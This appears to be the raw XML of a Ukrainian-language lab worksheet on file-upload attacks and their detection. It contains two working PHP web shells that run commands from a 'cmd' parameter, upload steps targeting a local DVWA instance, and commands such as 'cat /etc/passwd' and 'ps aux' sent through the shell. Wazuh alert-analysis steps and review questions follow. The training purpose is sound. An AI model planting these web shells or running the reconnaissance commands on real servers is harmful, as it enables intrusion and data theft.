        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F96E64">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> Створення файлу через редактор </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nano</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8F8548" w14:textId="6CB474C0" w:rsidR="00352FF0" w:rsidRPr="00F96E64" w:rsidRDefault="00A43F78" w:rsidP="00352FF0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nano</w:t>
      </w:r>
      <w:r w:rsidR="00352FF0" w:rsidRPr="00F96E64">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00352FF0" w:rsidRPr="00352FF0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>simple</w:t>
      </w:r>
      <w:r w:rsidR="00352FF0" w:rsidRPr="00F96E64">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00352FF0" w:rsidRPr="00352FF0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidR="00352FF0" w:rsidRPr="00F96E64">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00352FF0" w:rsidRPr="00352FF0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F8D453" w14:textId="74A22A6B" w:rsidR="00352FF0" w:rsidRDefault="00352FF0" w:rsidP="00352FF0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CE7566B" w14:textId="29FFBBAC" w:rsidR="00F96E64" w:rsidRPr="00F96E64" w:rsidRDefault="00F96E64" w:rsidP="00352FF0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#PHP-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>скрипт:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF664B1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?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1381D3EA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// Simple Web Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AB63FD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if(isset($_GET['cmd'])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2827D2A7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 xml:space="preserve">    system($_GET['cmd']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC92052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} else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E9A07D" w14:textId="77777777" w:rsidR="00352FF0" w:rsidRDefault="00352FF0" w:rsidP="00352FF0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
      </w:pPr>
      <w:r w:rsidRPr="00352FF0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    echo "Web Shell Active. </w:t>
      </w:r>
      <w:r>
        <w:t>Usage: ?cmd=command";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBEA5D1" w14:textId="77777777" w:rsidR="00352FF0" w:rsidRDefault="00352FF0" w:rsidP="00352FF0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7F322B" w14:textId="2467D753" w:rsidR="00352FF0" w:rsidRPr="00352FF0" w:rsidRDefault="00352FF0" w:rsidP="00352FF0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
      </w:pPr>
      <w:r>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66862217" w14:textId="508ABC8E" w:rsid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обуйте завантажити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VWA</w:t>
      </w:r>
      <w:r w:rsidRPr="00352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4096ED" w14:textId="36EAEBA7" w:rsidR="00352FF0" w:rsidRP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завантаження успішне, отримайт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 та відкрийте:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A11A79" w14:textId="6D5F39BC" w:rsidR="00352FF0" w:rsidRPr="00352FF0" w:rsidRDefault="00352FF0" w:rsidP="00352FF0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidRPr="00352FF0">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>localhost</w:t>
      </w:r>
      <w:r w:rsidRPr="00352FF0">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>hackable</w:t>
      </w:r>
      <w:r w:rsidRPr="00352FF0">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>uploads</w:t>
      </w:r>
      <w:r w:rsidRPr="00352FF0">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>simple</w:t>
      </w:r>
      <w:r w:rsidRPr="00352FF0">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00352FF0">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:r w:rsidRPr="00352FF0">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:r w:rsidRPr="00352FF0">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0BEAFB" w14:textId="7626FB93" w:rsidR="00F96E64" w:rsidRPr="00F96E64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іть більш функціональн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9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F96E6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F96E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61655631" w14:textId="1D453DC0" w:rsidR="00F96E64" w:rsidRPr="00F96E64" w:rsidRDefault="00F96E64" w:rsidP="00352FF0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F96E64">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> Створення файлу через редактор </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nano</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38720D33" w14:textId="0300D161" w:rsidR="00352FF0" w:rsidRPr="00352FF0" w:rsidRDefault="00352FF0" w:rsidP="00352FF0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nano</w:t>
      </w:r>
      <w:r w:rsidRPr="00352FF0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> advanced-shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A71405D" w14:textId="78EEBFC7" w:rsidR="00352FF0" w:rsidRDefault="00352FF0" w:rsidP="00352FF0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D902C9B" w14:textId="77777777" w:rsidR="00F96E64" w:rsidRDefault="00F96E64" w:rsidP="00F96E64">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#PHP-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>скрипт:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A403DCF" w14:textId="77777777" w:rsidR="00F96E64" w:rsidRPr="00352FF0" w:rsidRDefault="00F96E64" w:rsidP="00352FF0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35BED34D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!DOCTYPE html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BD0E8E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html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E458C5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head&gt;&lt;title&gt;Web Shell&lt;/title&gt;&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2E48B8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body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA89BCE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h2&gt;Command Execution&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6DE2F7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form method="GET"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A8C8E4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 xml:space="preserve">    &lt;input type="text" name="cmd" size="50" placeholder="Enter command"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132F9E49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 xml:space="preserve">    &lt;input type="submit" value="Execute"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D806A0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/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E82F322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pre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B60C02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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F78C74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>if(isset($_GET['cmd'])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD43547" w14:textId="77777777" w:rsidR="00352FF0" w:rsidRPr="00352FF0" w:rsidRDefault="00352FF0" w:rsidP="00352FF0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00352FF0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    echo shell_exec($_GET['cmd']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710CB770" w14:textId="77777777" w:rsidR="00352FF0" w:rsidRDefault="00352FF0" w:rsidP="00352FF0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE62AF1" w14:textId="77777777" w:rsidR="00352FF0" w:rsidRDefault="00352FF0" w:rsidP="00352FF0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
      </w:pPr>
      <w:r>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0A1EB8" w14:textId="77777777" w:rsidR="00352FF0" w:rsidRDefault="00352FF0" w:rsidP="00352FF0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/pre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B493109" w14:textId="77777777" w:rsidR="00352FF0" w:rsidRDefault="00352FF0" w:rsidP="00352FF0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3AC2F7" w14:textId="7D2E6FC7" w:rsidR="00F96E64" w:rsidRPr="007D1D84" w:rsidRDefault="00352FF0" w:rsidP="007D1D84">
      <w:pPr>
        <w:pStyle w:val="a4"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EE1392" w14:textId="4B1EA0DB" w:rsidR="00352FF0" w:rsidRP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те та протестуйте функціонал.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457EA91A" w14:textId="18115DA4" w:rsidR="00352FF0" w:rsidRDefault="00FB1FF8" w:rsidP="00352F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420ABB" wp14:editId="0BB65C77">
            <wp:extent cx="4028536" cy="1661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966" cy="16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97F2" w14:textId="48A9FE70" w:rsidR="00595ABD" w:rsidRPr="00595ABD" w:rsidRDefault="00595ABD" w:rsidP="00352F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Приклад </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Web Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BE5F28" w14:textId="0068A128" w:rsidR="00352FF0" w:rsidRPr="00352FF0" w:rsidRDefault="00352FF0" w:rsidP="00352FF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йте виконати різні команди:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E239EC" w14:textId="77777777" w:rsidR="00352FF0" w:rsidRDefault="00352FF0" w:rsidP="00352FF0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
      </w:pPr>
      <w:r>
        <w:t>ls -la</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D4E72E" w14:textId="1FB59E63" w:rsidR="00352FF0" w:rsidRDefault="00352FF0" w:rsidP="00352FF0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
      </w:pPr>
      <w:r>
        <w:t>cat /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF2D387" w14:textId="1805F94C" w:rsidR="00352FF0" w:rsidRPr="00595ABD" w:rsidRDefault="00352FF0" w:rsidP="00595ABD">
      <w:pPr>
        <w:pStyle w:val="a4"/>
      </w:pPr>
      <w:r>
        <w:t>ps aux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BB1F6A" w14:textId="6082BE0B" w:rsidR="00352FF0" w:rsidRDefault="00352FF0" w:rsidP="00352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7D1D8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52F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атак у </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:r w:rsidRPr="00352FF0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AFEDAC" w14:textId="434A4570" w:rsidR="00352FF0" w:rsidRPr="00352FF0" w:rsidRDefault="00352FF0" w:rsidP="007D1D84">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="360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йте </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Wazuh Dashboard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D405698" w14:textId="3B871E83" w:rsidR="00352FF0" w:rsidRPr="007D1D84" w:rsidRDefault="00352FF0" w:rsidP="007D1D84">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>https</w:t>
      </w:r>
      <w:r w:rsidRPr="007D1D84">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>://</w:t>
      </w:r>
      <w:r>
        <w:t>localhost</w:t>
      </w:r>
      <w:r w:rsidRPr="007D1D84">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A894249" w14:textId="0BD983EB" w:rsidR="00352FF0" w:rsidRDefault="007D1D84" w:rsidP="007D1D84">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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діть у розділ </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB1FF8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Threat</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB1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1FF8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Hunting</w:t>
      </w:r>
      <w:r w:rsidRPr="007D1D84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FB1FF8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Event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A68A77" w14:textId="08DB981A" w:rsidR="007D1D84" w:rsidRDefault="007D1D84" w:rsidP="007D1D84">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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згенеровані алерти, що відповідають створеним правилам.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B66C60E" w14:textId="6D0A1A52" w:rsidR="007D1D84" w:rsidRDefault="007D1D84" w:rsidP="007D1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1D8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B09095" wp14:editId="46323BEF">
            <wp:extent cx="5588899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056" cy="32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AE94" w14:textId="498FA6A8" w:rsidR="007D1D84" w:rsidRPr="007D1D84" w:rsidRDefault="007D1D84" w:rsidP="007D1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Приклад згенерованих алертів</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35387BA2" w14:textId="4CD652C0" w:rsidR="006C188E" w:rsidRDefault="007D1D84" w:rsidP="007D1D8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іть будь-який згенерований алерт та визначте:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55316578" w14:textId="3D520FBC" w:rsidR="007D1D84" w:rsidRDefault="007D1D84" w:rsidP="007D1D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le I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3283A1" w14:textId="52F5A8C0" w:rsidR="007D1D84" w:rsidRDefault="007D1D84" w:rsidP="007D1D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критичності загрози.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3557AF62" w14:textId="2374B951" w:rsidR="007D1D84" w:rsidRDefault="007D1D84" w:rsidP="007D1D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одії.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF61C89" w14:textId="7D28F022" w:rsidR="007D1D84" w:rsidRDefault="007D1D84" w:rsidP="007D1D8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 аб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D1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, який викликав спрацювання правила.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F9EF83" w14:textId="7C294659" w:rsidR="006C188E" w:rsidRDefault="006C188E" w:rsidP="006C188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7D1D8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C18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B650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ploittion</w:t>
      </w:r>
      <w:r w:rsidRPr="003B65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ї.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165C694A" w14:textId="0727368E" w:rsidR="006C188E" w:rsidRDefault="007D1D84" w:rsidP="006C188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D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6C188E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> отримайте:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F33816E" w14:textId="67D36E4F" w:rsidR="006C188E" w:rsidRPr="006C188E" w:rsidRDefault="006C188E" w:rsidP="006C188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у інформацію:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E03F34D" w14:textId="77777777" w:rsidR="006C188E" w:rsidRPr="006C188E" w:rsidRDefault="006C188E" w:rsidP="006C188E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C188E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>?cmd=uname -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AC0E5F" w14:textId="353BB1A1" w:rsidR="006C188E" w:rsidRPr="006C188E" w:rsidRDefault="006C188E" w:rsidP="006C188E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C188E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>?cmd=cat /etc/os-release</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607FCBEB" w14:textId="00B931F2" w:rsidR="006C188E" w:rsidRPr="006C188E" w:rsidRDefault="006C188E" w:rsidP="006C188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еву конфігурацію:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4E9F39" w14:textId="77777777" w:rsidR="006C188E" w:rsidRDefault="006C188E" w:rsidP="006C188E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>?cmd=ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223F2C92" w14:textId="77777777" w:rsidR="006C188E" w:rsidRDefault="006C188E" w:rsidP="006C188E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>?cmd=ip addr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C08946" w14:textId="793D8B1A" w:rsidR="006C188E" w:rsidRPr="006C188E" w:rsidRDefault="006C188E" w:rsidP="006C188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ів:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379574B2" w14:textId="77777777" w:rsidR="006C188E" w:rsidRDefault="006C188E" w:rsidP="006C188E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>?cmd=cat /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAAA268" w14:textId="77777777" w:rsidR="006C188E" w:rsidRDefault="006C188E" w:rsidP="006C188E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>?cmd=w</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2289A8F1" w14:textId="26A20D80" w:rsidR="006C188E" w:rsidRPr="006C188E" w:rsidRDefault="006C188E" w:rsidP="006C188E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>?cmd=last</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E6F379" w14:textId="2B42396E" w:rsidR="006C188E" w:rsidRPr="006C188E" w:rsidRDefault="006C188E" w:rsidP="006C188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и:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF201EA" w14:textId="77777777" w:rsidR="006C188E" w:rsidRPr="006C188E" w:rsidRDefault="006C188E" w:rsidP="006C188E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C188E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>?cmd=ps aux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333F2FCC" w14:textId="56DFB72B" w:rsidR="006C188E" w:rsidRDefault="006C188E" w:rsidP="006C188E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C188E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>?cmd=top -bn1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50688A61" w14:textId="77777777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EFC7D0" w14:textId="77777777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FBDF2" w14:textId="77777777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7A3B3" w14:textId="77777777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962068" w14:textId="26913227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3DC7EE" w14:textId="7C2BAD0E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9AE9BF" w14:textId="7C06215F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3B2350" w14:textId="01C679D3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3C4B40" w14:textId="421FA78D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6B99C6" w14:textId="61F71AB1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C7E95E" w14:textId="135098A9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D593F" w14:textId="33559529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482679" w14:textId="6BF8F554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E87DA5" w14:textId="1A28EC99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97244" w14:textId="18715586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ABFB5" w14:textId="1EC96E47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98665F" w14:textId="619C166A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14BA6C" w14:textId="6E060736" w:rsidR="007D1D84" w:rsidRDefault="007D1D84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4F957B" w14:textId="20267B0F" w:rsidR="00FB1FF8" w:rsidRDefault="00FB1FF8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4BAD29" w14:textId="153EFF60" w:rsidR="00FB1FF8" w:rsidRDefault="00FB1FF8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7B48F" w14:textId="77777777" w:rsidR="00FB1FF8" w:rsidRDefault="00FB1FF8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82D346" w14:textId="74EFC644" w:rsidR="006C188E" w:rsidRDefault="006C188E" w:rsidP="006C18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8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14:paraId="46C1299F" w14:textId="3346D80B" w:rsidR="006C188E" w:rsidRP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основна причина виникнення вразл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C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6C188E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDAE21B" w14:textId="3C06AD2C" w:rsidR="006C188E" w:rsidRP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команда дозволяє отримати інформацію про поточного користувача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C188E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672E33AB" w14:textId="6BBB4F38" w:rsid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наслідки може мати успішна експлуатація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ервера?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDAFEE6" w14:textId="12A1FE45" w:rsidR="006C188E" w:rsidRP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артефакти в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запитах можуть свідчити про спробу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C1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6C188E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA459D5" w14:textId="02A07AA0" w:rsid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механізм атак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18CF15D" w14:textId="2349ABF8" w:rsidR="006C188E" w:rsidRP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як його можна виявити під час моніторингу?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE649A5" w14:textId="54705A8A" w:rsid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тип атаки передбачає завантаження на сервер викону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18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у з можливістю передачі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6C188E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754E4090" w14:textId="093749AC" w:rsid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ки відповідають атакам типу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66C6371" w14:textId="0E7866A6" w:rsidR="006C188E" w:rsidRPr="006C188E" w:rsidRDefault="006C188E" w:rsidP="006C188E">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
